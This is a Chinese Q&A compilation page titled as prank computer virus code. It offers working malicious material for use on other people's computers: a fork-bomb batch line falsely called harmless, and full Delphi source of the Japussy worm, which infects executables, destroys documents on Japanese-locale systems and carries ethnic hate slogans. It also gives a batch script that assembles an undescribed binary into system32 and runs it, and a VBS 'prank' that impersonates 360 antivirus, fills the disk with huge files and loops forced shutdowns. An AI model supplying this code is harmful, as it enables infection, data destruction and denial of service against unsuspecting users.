当前位置:首页 > 联系黑客 > 正文内容

恶搞电脑病毒代码(电脑恶搞病毒下载)

hacker2年前 (2022-06-21)联系黑客115
本文导读目录:

恶搞电脑病毒代码有哪些

可以安装一些杀毒软件在电脑上

如电脑管家一类的,然后一直保持开启

这样就可以预防病毒进入到电脑当中了

小型恶搞病毒代码谁有?

代码:%0|%0

记事本输入,另存为新建文本文档.bat

会让电脑死机一小会儿,但不会对电脑造成任何、一丝一毫的伤害

附:你没看错,代码只有5字节

电脑病毒代码

不行的 得用虚拟机才可以测试病毒代码 无需下载,把下面这段代码复制到记事本里,保存为文本文件

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

熊猫烧香

ogram Japussy;

uses

Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};

const

HeaderSize = 82432; //病毒体的大小

IconOffset = $12EB8; //PE文件主图标的偏移量

//在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同

//查找2800000020的十六进制字符串可以找到主图标的偏移量

{

HeaderSize = 38912; //Upx压缩过病毒体的大小

IconOffset = $92BC; //Upx压缩过PE文件主图标的偏移量

//Upx 1.24W 用法: upx -9 --8086 Japussy.exe

}

IconSize = $2E8; //PE文件主图标的大小--744字节

IconTail = IconOffset + IconSize; //PE文件主图标的尾部

ID = $44444444; //感染标记

//垃圾码,以备写入

Catchword = 'If a race need to be killed out, it must be Yamato. ' +

'If a country need to be destroyed, it must be Japan! ' +

'*** W32.Japussy.Worm.A ***';

{$R *.RES}

function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;

stdcall; external 'Kernel32.dll'; //函数声明

var

TmpFile: string;

Si: STARTUPINFO;

Pi: PROCESS_INFORMATION;

IsJap: Boolean = False; //日文操作系统标记

{ 判断是否为Win9x }

function IsWin9x: Boolean;

var

Ver: TOSVersionInfo;

begin

Result := False;

Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);

if not GetVersionEx(Ver) then

Exit;

if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x

Result := True;

end;

{ 在流之间复制 }

procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;

dStartPos: Integer; Count: Integer);

var

sCurPos, dCurPos: Integer;

begin

sCurPos := Src.Position;

dCurPos := Dst.Position;

Src.Seek(sStartPos, 0);

Dst.Seek(dStartPos, 0);

Dst.CopyFrom(Src, Count);

Src.Seek(sCurPos, 0);

Dst.Seek(dCurPos, 0);

end;

{ 将宿主文件从已感染的PE文件中分离出来,以备使用 }

procedure ExtractFile(FileName: string);

var

sStream, dStream: TFileStream;

begin

try

sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);

try

dStream := TFileStream.Create(FileName, fmCreate);

try

sStream.Seek(HeaderSize, 0); //跳过头部的病毒部分

dStream.CopyFrom(sStream, sStream.Size - HeaderSize);

finally

dStream.Free;

end;

finally

sStream.Free;

end;

except

end;

end;

{ 填充STARTUPINFO结构 }

procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);

begin

Si.cb := SizeOf(Si);

Si.lpReserved := nil;

Si.lpDesktop := nil;

Si.lpTitle := nil;

Si.dwFlags := STARTF_USESHOWWINDOW;

Si.wShowWindow := State;

Si.cbReserved2 := 0;

Si.lpReserved2 := nil;

end;

{ 发带毒邮件 }

procedure SendMail;

begin

//哪位仁兄愿意完成之?

end;

{ 感染PE文件 }

procedure InfectOneFile(FileName: string);

var

HdrStream, SrcStream: TFileStream;

IcoStream, DstStream: TMemoryStream;

iID: LongInt;

aIcon: TIcon;

Infected, IsPE: Boolean;

i: Integer;

Buf: array[0..1] of Char;

begin

try //出错则文件正在被使用,退出

if CompareText(FileName, 'JAPUSSY.EXE') = 0 then //是自己则不感染

Exit;

Infected := False;

IsPE := False;

SrcStream := TFileStream.Create(FileName, fmOpenRead);

try

for i := 0 to $108 do //检查PE文件头

begin

SrcStream.Seek(i, soFromBeginning);

SrcStream.Read(Buf, 2);

if (Buf[0] = #80) and (Buf[1] = #69) then //PE标记

begin

IsPE := True; //是PE文件

Break;

end;

end;

SrcStream.Seek(-4, soFromEnd); //检查感染标记

SrcStream.Read(iID, 4);

if (iID = ID) or (SrcStream.Size 10240) then //太小的文件不感染

Infected := True;

finally

SrcStream.Free;

end;

if Infected or (not IsPE) then //如果感染过了或不是PE文件则退出

Exit;

IcoStream := TMemoryStream.Create;

DstStream := TMemoryStream.Create;

try

aIcon := TIcon.Create;

try

//得到被感染文件的主图标(744字节),存入流

aIcon.ReleaseHandle;

aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0);

aIcon.SaveToStream(IcoStream);

finally

aIcon.Free;

end;

SrcStream := TFileStream.Create(FileName, fmOpenRead);

//头文件

HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);

try

//写入病毒体主图标之前的数据

CopyStream(HdrStream, 0, DstStream, 0, IconOffset);

//写入目前程序的主图标

CopyStream(IcoStream, 22, DstStream, IconOffset, IconSize);

//写入病毒体主图标到病毒体尾部之间的数据

CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail);

//写入宿主程序

CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size);

//写入已感染的标记

DstStream.Seek(0, 2);

iID := $44444444;

DstStream.Write(iID, 4);

finally

HdrStream.Free;

end;

finally

SrcStream.Free;

IcoStream.Free;

DstStream.SaveToFile(FileName); //替换宿主文件

DstStream.Free;

end;

except;

end;

end;

{ 将目标文件写入垃圾码后删除 }

procedure SmashFile(FileName: string);

var

FileHandle: Integer;

i, Size, Mass, Max, Len: Integer;

begin

try

SetFileAttributes(PChar(FileName), 0); //去掉只读属性

FileHandle := FileOpen(FileName, fmOpenWrite); //打开文件

try

Size := GetFileSize(FileHandle, nil); //文件大小

i := 0;

Randomize;

Max := Random(15); //写入垃圾码的随机次数

if Max 5 then

Max := 5;

Mass := Size div Max; //每个间隔块的大小

Len := Length(Catchword);

while i Max do

begin

FileSeek(FileHandle, i * Mass, 0); //定位

//写入垃圾码,将文件彻底破坏掉

FileWrite(FileHandle, Catchword, Len);

Inc(i);

end;

finally

FileClose(FileHandle); //关闭文件

end;

DeleteFile(PChar(FileName)); //删除之

except

end;

end;

{ 获得可写的驱动器列表 }

function GetDrives: string;

var

DiskType: Word;

D: Char;

Str: string;

i: Integer;

begin

for i := 0 to 25 do //遍历26个字母

begin

D := Chr(i + 65);

Str := D + ':';

DiskType := GetDriveType(PChar(Str));

//得到本地磁盘和网络盘

if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then

Result := Result + D;

end;

end;

{ 遍历目录,感染和摧毁文件 }

procedure LoopFiles(Path, Mask: string);

var

i, Count: Integer;

Fn, Ext: string;

SubDir: TStrings;

SearchRec: TSearchRec;

Msg: TMsg;

function IsValidDir(SearchRec: TSearchRec): Integer;

begin

if (SearchRec.Attr '.') and

(SearchRec.Name '..') then

Result := 0 //不是目录

else if (SearchRec.Attr = 16) and (SearchRec.Name '.') and

(SearchRec.Name '..') then

Result := 1 //不是根目录

else Result := 2; //是根目录

end;

begin

if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then

begin

repeat

PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //调整消息队列,避免引起怀疑

if IsValidDir(SearchRec) = 0 then

begin

Fn := Path + SearchRec.Name;

Ext := UpperCase(ExtractFileExt(Fn));

if (Ext = '.EXE') or (Ext = '.SCR') then

begin

InfectOneFile(Fn); //感染可执行文件

end

else if (Ext = '.HTM') or (Ext = '.HTML') or (Ext = '.ASP') then

begin

//感染HTML和ASP文件,将Base64编码后的病毒写入

//感染浏览此网页的所有用户

//哪位大兄弟愿意完成之?

end

else if Ext = '.WAB' then //Outlook地址簿文件

begin

//获取Outlook邮件地址

end

else if Ext = '.ADC' then //Foxmail地址自动完成文件

begin

//获取Foxmail邮件地址

end

else if Ext = 'IND' then //Foxmail地址簿文件

begin

//获取Foxmail邮件地址

end

else

begin

if IsJap then //是倭文操作系统

begin

if (Ext = '.DOC') or (Ext = '.XLS') or (Ext = '.MDB') or

(Ext = '.MP3') or (Ext = '.RM') or (Ext = '.RA') or

(Ext = '.WMA') or (Ext = '.ZIP') or (Ext = '.RAR') or

(Ext = '.MPEG') or (Ext = '.ASF') or (Ext = '.JPG') or

(Ext = '.JPEG') or (Ext = '.GIF') or (Ext = '.SWF') or

(Ext = '.PDF') or (Ext = '.CHM') or (Ext = '.AVI') then

SmashFile(Fn); //摧毁文件

end;

end;

end;

//感染或删除一个文件后睡眠200毫秒,避免CPU占用率过高引起怀疑

Sleep(200);

until (FindNext(SearchRec) 0);

end;

FindClose(SearchRec);

SubDir := TStringList.Create;

if (FindFirst(Path + '*.*', faDirectory, SearchRec) = 0) then

begin

repeat

if IsValidDir(SearchRec) = 1 then

SubDir.Add(SearchRec.Name);

until (FindNext(SearchRec) 0);

end;

FindClose(SearchRec);

Count := SubDir.Count - 1;

for i := 0 to Count do

LoopFiles(Path + SubDir.Strings + '', Mask);

FreeAndNil(SubDir);

end;

{ 遍历磁盘上所有的文件 }

procedure InfectFiles;

var

DriverList: string;

i, Len: Integer;

begin

if GetACP = 932 then //日文操作系统

IsJap := True; //去死吧!

DriverList := GetDrives; //得到可写的磁盘列表

Len := Length(DriverList);

while True do //死循环

begin

for i := Len downto 1 do //遍历每个磁盘驱动器

LoopFiles(DriverList + ':', '*.*'); //感染之

SendMail; //发带毒邮件

Sleep(1000 * 60 * 5); //睡眠5分钟

end;

end;

{ 主程序开始 }

begin

if IsWin9x then //是Win9x

RegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程

else //WinNT

begin

//远程线程映射到Explorer进程

//哪位兄台愿意完成之?

end;

//如果是原始病毒体自己

if CompareText(ExtractFileName(ParamStr(0)), 'Japussy.exe') = 0 then

InfectFiles //感染和发邮件

else //已寄生于宿主程序上了,开始工作

begin

TmpFile := ParamStr(0); //创建临时文件

Delete(TmpFile, Length(TmpFile) - 4, 4);

TmpFile := TmpFile + #32 + '.exe'; //真正的宿主文件,多一个空格

ExtractFile(TmpFile); //分离之

FillStartupInfo(Si, SW_SHOWDEFAULT);

CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,

0, nil, '.', Si, Pi); //创建新进程运行之

InfectFiles; //感染和发邮件

end;

end

世界上最搞笑的电脑病毒是什么?

最恐怖病毒-MalwareProtector2008和AdvancedXpFixer会一点点得“吃掉”被感染电脑的桌面.实际上,这两个病毒是由一个杀毒软件公司制造的.该公司希望通过这种方式让用户使用他们的产品.

最爱干净病毒-Tixcet.A会删除用户硬盘上的所有文件.

绑架者病毒-PGPCoder.E和“ransomware”.该病毒会对用户电脑硬盘上的数据进行加密,然后向用户索要金钱.用户只有花钱才能得到解密密码.

最浪漫病毒-Nuwar.OL,Nuwar.QI和Valentin.E用浪漫的内容来勾引用户点击激活它从而感染电脑.

最具资讯功能病毒-尽管该病毒名为Romeo.C,它却能让你获取丰富的资讯信息.Rome.C不仅窜改windows注册表,还会在发作时弹出新闻窗口.

骗子病毒- Manclick.A, Manclick.B 和Manclick.C会像别的病毒一样,让用户觉得他们是安装了一个合法的软件,而非恶意软件.它们还会将用户引向钩鱼网站,收集用户隐私用于网上诈骗.

最具欺骗性病毒-蠕虫病毒FakeDeath通过散布消息称古巴总统菲德尔·卡斯特罗已死亡来吸引用户点击而感染电脑.

《启示录》布道者病毒-RenameLoi.A有电脑上运行时会发出烦人的噪音并弹出有关反基督教和审判日的窗口.

酷酷猪病毒-当用户运行含有MSNWorm.EI蠕虫病毒代码的文件时,电脑上就弹出一张化了妆带着项链和太阳眼镜的猪的图片.

最吵病毒-中了BeepBeep.A病毒后,用户进入Windows或打开系统文件时电脑会发出一串烦人的噪声.

使计算机关机的玩笑病毒代码

打开个txt,输入

shutdown -l -o

另存为*.cmd,双击,不过这太白痴了

这样更好

taskkill /f /im *.exe shutdown -l -o 1nul 2nul

这也白痴,想开玩笑不一定关机,我弄过一个脚本,

@echo e 100 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 tmp11

@echo e 110 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 tmp11

@echo e 120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 tmp11

@echo e 130 00 00 00 00 00 00 00 00 00 00 00 00 C8 00 00 00 tmp11

@echo e 140 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 tmp11

@echo e 150 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F tmp11

@echo e 160 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 tmp11

@echo e 170 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 tmp11

@echo e 180 E7 81 B5 C3 A3 E0 DB 90 A3 E0 DB 90 A3 E0 DB 90 tmp11

@echo e 190 B0 E8 86 90 A1 E0 DB 90 20 E8 86 90 A0 E0 DB 90 tmp11

@echo e 1A0 A3 E0 DA 90 AA E0 DB 90 A6 EC 84 90 A1 E0 DB 90 tmp11

@echo e 1B0 A6 EC 81 90 A2 E0 DB 90 52 69 63 68 A3 E0 DB 90 tmp11

@echo e 1C0 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 00 tmp11

@echo e 1D0 FD 19 07 3F 00 00 00 00 00 00 00 00 E0 00 0F 01 tmp11

@echo e 1E0 0B 01 07 0A 00 02 00 00 00 04 00 00 00 00 00 00 tmp11

@echo e 1F0 C0 10 00 00 00 10 00 00 00 20 00 00 00 00 40 00 tmp11

@echo e 200 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 tmp11

@echo e 210 04 00 00 00 00 00 00 00 00 40 00 00 00 04 00 00 tmp11

@echo e 220 00 00 00 00 02 00 00 04 00 00 10 00 00 10 00 00 tmp11

@echo e 230 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 tmp11

@echo e 240 00 00 00 00 00 00 00 00 4C 20 00 00 3C 00 00 00 tmp11

@echo e 250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 tmp11

@echo e 260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 tmp11

@echo e 270 30 20 00 00 1C 00 00 00 00 00 00 00 00 00 00 00 tmp11

@echo e 280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 tmp11

@echo e 290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 tmp11

@echo e 2A0 00 20 00 00 2C 00 00 00 00 00 00 00 00 00 00 00 tmp11

@echo e 2B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 tmp11

@echo e 2C0 2E 74 65 78 74 00 00 00 86 01 00 00 00 10 00 00 tmp11

@echo e 2D0 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 tmp11

@echo e 2E0 00 00 00 00 20 00 00 60 2E 72 64 61 74 61 00 00 tmp11

@echo e 2F0 98 01 00 00 00 20 00 00 00 02 00 00 00 06 00 00 tmp11

@echo e 300 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 tmp11

@echo e 310 2E 64 61 74 61 00 00 00 28 00 00 00 00 30 00 00 tmp11

@echo e 320 00 02 00 00 00 08 00 00 00 00 00 00 00 00 00 00 tmp11

@echo e 330 00 00 00 00 40 00 00 C0 00 00 00 00 00 00 00 00 tmp11

@echo e 500 56 8B 74 24 08 57 68 10 30 40 00 56 FF 15 10 20 tmp11

@echo e 510 40 00 8B 0D 10 30 40 00 83 F9 CE 8B 15 18 30 40 tmp11

@echo e 520 00 8B 3D 24 30 40 00 A1 14 30 40 00 7D 21 83 F8 tmp11

@echo e 530 CE 7C 21 6A 05 6A 00 6A 00 83 E8 0A 50 51 6A 00 tmp11

@echo e 540 56 A3 14 30 40 00 FF 15 0C 20 40 00 5F 5E C3 83 tmp11

@echo e 550 F8 CE 7D 0E 53 8D 5F 32 3B D3 5B 7F 05 83 C1 0A tmp11

@echo e 560 EB 39 83 C7 32 3B D7 7E 2F 8B 15 20 30 40 00 8B tmp11

@echo e 570 3D 1C 30 40 00 83 C2 32 3B FA 7F 1C 6A 05 6A 00 tmp11

@echo e 580 6A 00 83 C0 0A 50 51 6A 00 56 A3 14 30 40 00 FF tmp11

@echo e 590 15 0C 20 40 00 5F 5E C3 83 E9 0A 6A 05 6A 00 6A tmp11

@echo e 5A0 00 50 51 6A 00 56 89 0D 10 30 40 00 FF 15 0C 20 tmp11

@echo e 5B0 40 00 5F 5E C3 CC CC CC CC CC CC CC CC CC CC CC tmp11

@echo e 5C0 56 68 10 30 40 00 FF 15 24 20 40 00 50 FF 15 10 tmp11

@echo e 5D0 20 40 00 A1 18 30 40 00 8B 0D 1C 30 40 00 8B 35 tmp11

@echo e 5E0 20 20 40 00 68 91 00 00 00 A3 24 30 40 00 89 0D tmp11

@echo e 5F0 20 30 40 00 FF D6 A8 01 75 60 53 8B 1D 1C 20 40 tmp11

@echo e 600 00 55 8B 2D 18 20 40 00 57 8B 3D 14 20 40 00 90 tmp11

@echo e 610 FF D7 50 E8 E8 FE FF FF 83 C4 04 6A 00 FF D3 50 tmp11

@echo e 620 E8 DB FE FF FF 83 C4 04 E8 36 00 00 00 99 F7 3D tmp11

@echo e 630 20 30 40 00 52 E8 29 00 00 00 99 F7 3D 24 30 40 tmp11

@echo e 640 00 52 FF D5 6A 14 FF 15 00 20 40 00 68 91 00 00 tmp11

@echo e 650 00 FF D6 A8 01 74 B9 5F 5D 5B 6A 00 FF 15 04 20 tmp11

@echo e 660 40 00 5E A1 00 30 40 00 69 C0 FD 43 03 00 05 C3 tmp11

@echo e 670 9E 26 00 A3 00 30 40 00 33 C0 66 A1 02 30 40 00 tmp11

@echo e 680 25 FF 7F 00 00 C3 00 00 00 00 00 00 00 00 00 00 tmp11

@echo e 700 C2 20 00 00 B4 20 00 00 00 00 00 00 D8 20 00 00 tmp11

@echo e 710 E8 20 00 00 F8 20 00 00 0E 21 00 00 1E 21 00 00 tmp11

@echo e 720 2E 21 00 00 3C 21 00 00 00 00 00 00 00 00 00 00 tmp11

@echo e 730 00 00 00 00 FD 19 07 3F 00 00 00 00 02 00 00 00 tmp11

@echo e 730 00 00 00 00 FD 19 07 3F 00 00 00 00 02 00 00 00 tmp11

@echo e 740 3C 00 00 00 5C 21 00 00 5C 07 00 00 88 20 00 00 tmp11

@echo e 750 00 00 00 00 00 00 00 00 CA 20 00 00 00 20 00 00 tmp11

@echo e 760 94 20 00 00 00 00 00 00 00 00 00 00 50 21 00 00 tmp11

@echo e 770 0C 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 tmp11

@echo e 780 00 00 00 00 00 00 00 00 C2 20 00 00 B4 20 00 00 tmp11

@echo e 790 00 00 00 00 D8 20 00 00 E8 20 00 00 F8 20 00 00 tmp11

@echo e 7A0 0E 21 00 00 1E 21 00 00 2E 21 00 00 3C 21 00 00 tmp11

@echo e 7B0 00 00 00 00 AF 00 45 78 69 74 50 72 6F 63 65 73 tmp11

@echo e 7C0 73 00 47 03 53 6C 65 65 70 00 4B 45 52 4E 45 4C tmp11

@echo e 7D0 33 32 2E 64 6C 6C 00 00 83 02 53 65 74 57 69 6E tmp11

@echo e 7E0 64 6F 77 50 6F 73 00 00 74 01 47 65 74 57 69 6E tmp11

@echo e 7F0 64 6F 77 52 65 63 74 00 17 01 47 65 74 46 6F 72 tmp11

@echo e 800 65 67 72 6F 75 6E 64 57 69 6E 64 6F 77 00 4F 02 tmp11

@echo e 810 53 65 74 43 75 72 73 6F 72 50 6F 73 00 00 63 01 tmp11

@echo e 820 47 65 74 54 6F 70 57 69 6E 64 6F 77 00 00 21 01 tmp11

@echo e 830 47 65 74 4B 65 79 53 74 61 74 65 00 0E 01 47 65 tmp11

@echo e 840 74 44 65 73 6B 74 6F 70 57 69 6E 64 6F 77 00 00 tmp11

@echo e 850 55 53 45 52 33 32 2E 64 6C 6C 00 00 52 53 44 53 tmp11

@echo e 860 15 F4 68 A6 3F 1B F6 4A 85 E8 67 8B 58 CA E2 04 tmp11

@echo e 870 02 00 00 00 66 3A 5C 50 72 6F 6A 65 63 74 73 5C tmp11

@echo e 880 46 65 61 73 74 5C 52 65 6C 65 61 73 65 5C 46 65 tmp11

@echo e 890 61 73 74 2E 70 64 62 00 00 00 00 00 00 00 00 00 tmp11

@echo rcxtmp11

@echo A00tmp11

@echo n tmp1tmp11

@echo wtmp11

@echo qtmp11

@debugtmp11

@Copy /b /y tmp1 %systemroot%\system32\Feast.exe

@start %systemroot%\system32\Feast.exe

@del tmp11

@del tmp1

把这些写道txt里面,另存为 文件名.bat,双击运行,绝对的joke,很好玩的哦~

这两个都不是病毒。

-绝对原创答案

我想要一种整人的电脑病毒代码,要有图片跟声音的,而且只能打开一次!求高手给!谢谢!

shutdown -s -t 10

你可以先自己试试按windown(开始键)加 r

然后输入以上文字

有没有一些恶搞别人的vbs代码

自编vbs仅供娱乐!!!

set qstart = wscript.CreateObject("wscript.shell")

set qweb = CreateObject("Wscript.Shell")

set qwrite = CreateObject("scripting.filesystemobject")

set qsay = CreateObject("sapi.spvoice")

qstart.run "D:\病毒BGM.mp3" '《江南皮革厂倒闭了》

msgbox "您的电脑已被病毒入侵!",vbokonly+vbExclamation,"360 Defender"

qstart.run "cmd.exe /c start appwiz.cpl"

qstart.run "cmd.exe /c start bthprops.cpl"

qstart.run "cmd.exe /c start calc.exe"

qstart.run "cmd.exe /c start cleanmgr.exe"

qstart.run "cmd.exe /c start cmd.exe"

qstart.run "cmd.exe /c start colorcpl.exe"

qstart.run "cmd.exe /c start control.exe"

qstart.run "cmd.exe /c start cttune.exe"

qstart.run "cmd.exe /c start desk.cpl"

qstart.run "cmd.exe /c start dfrgui.exe"

qstart.run "cmd.exe /c start dxdiag.exe"

qstart.run "cmd.exe /c start FileHistory.exe"

qstart.run "cmd.exe /c start Firewall.cpl"

qstart.run "cmd.exe /c start Fondue.exe"

qstart.run "cmd.exe /c start fontview.exe"

qstart.run "cmd.exe /c start fsquirt.exe"

qstart.run "cmd.exe /c start hdwwiz.cpl"

qstart.run "cmd.exe /c start inetcpl.cpl"

qstart.run "cmd.exe /c start intl.cpl"

qstart.run "cmd.exe /c start irprops.cpl"

qstart.run "cmd.exe /c start joy.cpl"

qstart.run "cmd.exe /c start LaunchTM.exe"

qstart.run "cmd.exe /c start Magnify.exe"

qstart.run "cmd.exe /c start main.cpl"

qstart.run "cmd.exe /c start mblctr.exe"

qstart.run "cmd.exe /c start mmsys.cpl"

qstart.run "cmd.exe /c start msinfo32.exe"

qstart.run "cmd.exe /c start mspaint.exe"

qstart.run "cmd.exe /c start ncpa.cpl"

qstart.run "cmd.exe /c start notepad.exe"

qstart.run "cmd.exe /c start powercfg.cpl"

qstart.run "cmd.exe /c start RTSnMg64.cpl"

qstart.run "cmd.exe /c start SnippingTool.exe"

qstart.run "cmd.exe /c start sysdm.cpl"

qstart.run "cmd.exe /c start TabletPC.cpl"

qstart.run "cmd.exe /c start telephon.cpl"

qstart.run "cmd.exe /c start timedate.cpl"

qstart.run "cmd.exe /c start write.exe"

qstart.run "cmd.exe /c start wscript.exe"

qstart.run "cmd.exe /c start wscui.cpl"

qstart.run "cmd.exe /c fsutil file createnew 1.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 2.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 3.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 4.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 5.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 6.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 7.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 8.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 9.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 10.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 11.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 12.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 13.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 14.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 15.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 16.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 17.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 18.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 19.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 20.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 21.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 22.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 23.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 24.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 25.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 26.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 27.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 28.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 29.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 30.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 31.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 32.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 33.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 34.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 35.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 36.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 37.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 38.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 39.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 40.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 41.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 42.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 43.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 44.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 45.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 46.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 47.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 48.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 49.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 50.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 51.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 52.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 53.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 54.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 55.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 56.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 57.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 58.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 59.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 60.bug 40000"

qstart.run "cmd.exe /c fsutil file createnew 61.bug 400000"

qstart.run "cmd.exe /c fsutil file createnew 62.bug 4000000"

qstart.run "cmd.exe /c fsutil file createnew 63.bug 40000000"

qstart.run "cmd.exe /c fsutil file createnew 64.bug 400000000"

qstart.run "cmd.exe /c fsutil file createnew 65.bug 4000000000"

qstart.run "cmd.exe /c fsutil file createnew 666.bug 40000000000"

wscript.sleep 25000

qstart.run "cmd.exe /c shutdown -s -t 60 -c ""360公司温馨提醒:因为这个游戏涉及非法内容,所以您的电脑将在60秒后自动关机"" ",0,true

qstart.run "cmd.exe /c echo 滚|clip"

A = INPUTBOX ("说!360是不是上帝?"+chr(13)+chr(13)+chr(13)+"(“滚”已复制到剪贴板,可以粘贴。)","360 Defender","不是",8000,7000)

IF A = "是" then

qstart.run "cmd.exe /c shutdown -a",0,true

msgbox "好的,现在您可以下载360安全卫士来杀毒了。",vbokonly,"360 Defender"

do

qweb.run"https://hao.360.com/"

loop

ELSEIF A = "不是" then

qstart.run "cmd.exe /c shutdown -a",0,true

msgbox chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+"您怎么这么懒呢?",vbokonly+vbQuestion,"360 Defender"

msgbox chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+"是时候锻炼锻炼了",vbokonly+vbInformation,"360 Defender"

msgbox "游戏规则:在开始后,请及时点击 “确定” 键来取消关机。"+chr(13)+"现在您可以把这个窗口x掉,或者点击确定,来开始游戏。",vbokonly+vbInformation,"360 Defender"

do

qstart.run "cmd.exe /c shutdown -s -t 5 ",0,true

msgbox "取消关机",vbokonly,"360 Defender"

qstart.run "cmd.exe /c shutdown -a",0,true

qweb.run"https://hao.360.com/"

qweb.run"https://hao.360.com/"

qweb.run"https://hao.360.com/"

loop

ELSEIF A = "" then

qstart.run "cmd.exe /c shutdown -a",0,true

msgbox "周鸿祎表示无语。"+chr(13)+chr(13)+chr(13)+"这样是不可能解决问题的",vbokonly,"360 Defender"

msgbox "自己探寻吧",vbokonly,"360 Defender"

do

qstart.run "cmd.exe /c shutdown -s -t 5",0,true

qstart.run "cmd"

qstart.run "cmd"

qstart.run "cmd"

qstart.run "cmd"

qstart.run "cmd"

qstart.run "cmd"

qstart.run "cmd"

qstart.run "cmd"

qstart.run "cmd"

qstart.run "cmd"

qstart.run "cmd"

qstart.run "cmd"

